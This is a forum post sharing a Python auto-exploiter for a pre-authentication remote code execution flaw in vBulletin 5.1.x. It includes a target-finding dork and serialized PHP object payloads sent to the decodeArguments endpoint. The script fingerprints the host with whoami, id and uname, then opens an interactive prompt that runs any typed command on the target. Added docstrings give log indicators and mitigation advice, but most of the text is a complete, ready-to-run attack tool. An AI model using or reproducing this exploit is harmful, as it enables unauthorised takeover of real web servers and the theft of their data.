
vBulletin 5.1

redkit tarafından ... 31.05.2016 - 18:23
			#Exploit Title: vBulletin 5.1.x - PreAuth Remote Code Execution
#Date: 11-10-2015
#Dork:Powered by: vBulletin, Version 5.1 or make your own ^^
#Requirements: Python 3.4.x or higher, install Requests and parse Module.
#Description: We are not the authors of this exploit; we just fixed the exploit and coded this script (Mauritania Attacker & Th3Falcon)
 
import  requests, re, sys
import  parse as   urlparse  #BUG Python Module Parse Fixed By Mauritania Attacker (urllib.parse does not work properly)
 
def banner():
    """Print the start-up banner, framed by blank lines above and below."""
    framed_text = (
        '++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++',
        '               VBulletin 5.1.x RCE auto Exploiter Priv8             ',
        '                 GreetZ To All Members                    ',
        '                 Coded by Mauritania Attacker & Th3Falcon           ',
        '++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++',
    )
    # print('\n') writes two line breaks: the literal one plus print's own terminator.
    print( '\n' )
    for row in framed_text:
        print( row )
    print( '\n' )
 
def inject( ghost: str ) -> str:
    """Probe one base URL and, if the probe answers, print a short host fingerprint.

    Two unauthenticated GET requests are sent to
    ``<ghost>/ajax/api/hook/decodeArguments``.  Each carries an ``arguments``
    query parameter in PHP ``serialize()`` format: a ``vB_dB_Result`` object
    whose ``db`` property is a ``vB_Database`` object with a ``functions``
    array mapping ``free_result`` to ``system``, and whose ``recordset``
    property is a shell command string.  The paste header describes the
    effect on vBulletin 5.1.x as pre-auth remote code execution.

    Args:
        ghost: Base URL typed by the operator; concatenated into the request
            URL as-is, with no validation.

    Returns:
        The fourth ``:::``-separated field of the second response (the
        ``pwd`` output) when both requests behave as expected, else ``''``.

    Review notes (defensive):
        * Log indicator: requests for ``/ajax/api/hook/decodeArguments``
          whose query string contains a serialized object
          (``arguments=O:12:"vB_dB_Result"``, possibly URL-encoded) and the
          ``%00*%00`` sequences.  The first probe also carries the fixed
          marker ``echo Th3Falcon``.
        * Mitigation: apply the vendor's security update for the affected
          vBulletin 5.1.x release; until then, block serialized-object
          values in the ``arguments`` parameter of this endpoint at the
          reverse proxy or WAF.
    """
    url = ghost + '/ajax/api/hook/decodeArguments?' #Added "?" after each decodeArguments variable By Mauritania Attacker
    try:
        # Probe request: the command is a harmless echo of a fixed marker string.
        r = requests.get( url, params = 'arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:14:"echo Th3Falcon";}', timeout= 50 )
        # Success requires the marker in a body shorter than 50 characters --
        # presumably to exclude pages that merely reflect the request; confirm.
        if 'Th3Falcon' in r.text and len( r.text ) < 50:
            try:
                # Fingerprint request: four commands whose outputs are separated by ':::'.
                r   = requests.get( url, params = 'arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:49:"whoami;echo :::;id;echo :::;uname -a;echo :::;pwd";}', timeout= 50 )
                # NOTE(review): the labels do not line up with the commands --
                # field 0 is the `whoami` output (printed as GROUP) and field 1
                # is the `id` output (printed as USER).
                print( '     [+] GROUP   :  ' + r.text.split( ':::' )[0].strip() )
                print( '     [+] USER    :  ' + r.text.split( ':::' )[1].strip() )
                print( '     [+] KERNEL  :  ' + r.text.split( ':::' )[2].strip() )
                print( '     [+] DIR     :  ' + r.text.split( ':::' )[3].strip() )
                sys.stdout.flush()
                return r.text.split( ':::' )[3].strip();
            except:
                # Bare except: network errors and a response with fewer than
                # four fields (IndexError) are both reported as "no result".
                return ''
        else:
            return ''
    except:
        # Bare except around the probe request: any failure is reduced to this message.
        print('     [+] Problem while exploiting..')
        return ''
 
def bash(ghost: str, command: str) -> None:
    """Send one operator-typed command in the serialized-object request and print the reply.

    The request has the same shape as the ones built in ``inject``: a GET to
    ``<ghost>/ajax/api/hook/decodeArguments`` whose ``arguments`` parameter
    holds a serialized ``vB_dB_Result`` object, with ``command`` placed in
    the ``recordset`` string and prefixed by ``len(command)``.

    Args:
        ghost: Base URL of the target, concatenated into the request URL as-is.
        command: Text typed at the prompt; inserted into the payload unmodified.

    Returns:
        None.  The raw response body is printed.

    Review notes (defensive):
        * Every command is its own GET request with the command text in the
          query string, so on a host that logs full request URLs the access
          log holds one entry per command -- useful when reconstructing
          activity during incident response.
        * There is no error handling here: a ``requests`` exception
          propagates to the caller.
    """
    url = ghost + '/ajax/api/hook/decodeArguments?' #Added "?" after each decodeArguments variable By Mauritania Attacker
    r = requests.get( url, params = 'arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:' + str(len(command)) + ':"' + command + '";}', timeout= 50 )
    print(r.text)
 
def main() -> None:
    """Run the interactive loop: read a target, probe it, then relay typed commands.

    The outer loop reads a base URL from stdin until ``exit`` is entered.
    Each URL is passed to ``inject``; a non-empty return value opens an inner
    prompt whose lines are passed to ``bash`` until ``exit`` is entered, after
    which the outer prompt asks for the next target.
    """
    banner()
    site = ''
    while site != 'exit':
        site = input('Target : ')
        if site == 'exit':
            break
        # inject() returns '' for every failure path, so '' doubles as "not vulnerable".
        mad = inject(site)
        if mad != '' :
           
            print('     [+] @Connection Successfully established... \n')
            userinput = ''
            while userinput != 'exit':
                # NOTE(review): "[email protected]" looks like the hosting site's
                # e-mail obfuscation replacing the original prompt text -- confirm.
                userinput = input("[email protected] :")
                if userinput == 'exit':
                    break
                # One request per typed line; nothing is filtered or logged locally.
                bash(site, userinput)
        else:
            print('     [+] Website is not Vulnerable :(')
 
# Start the interactive prompt only when the file is run as a script;
# importing the module does not call main().
if __name__ == '__main__':
    main()
 
#D0ne
#./Mauritania Attacker
#./Th3Falcon
#GreetZ To All AnonGhost MemberZ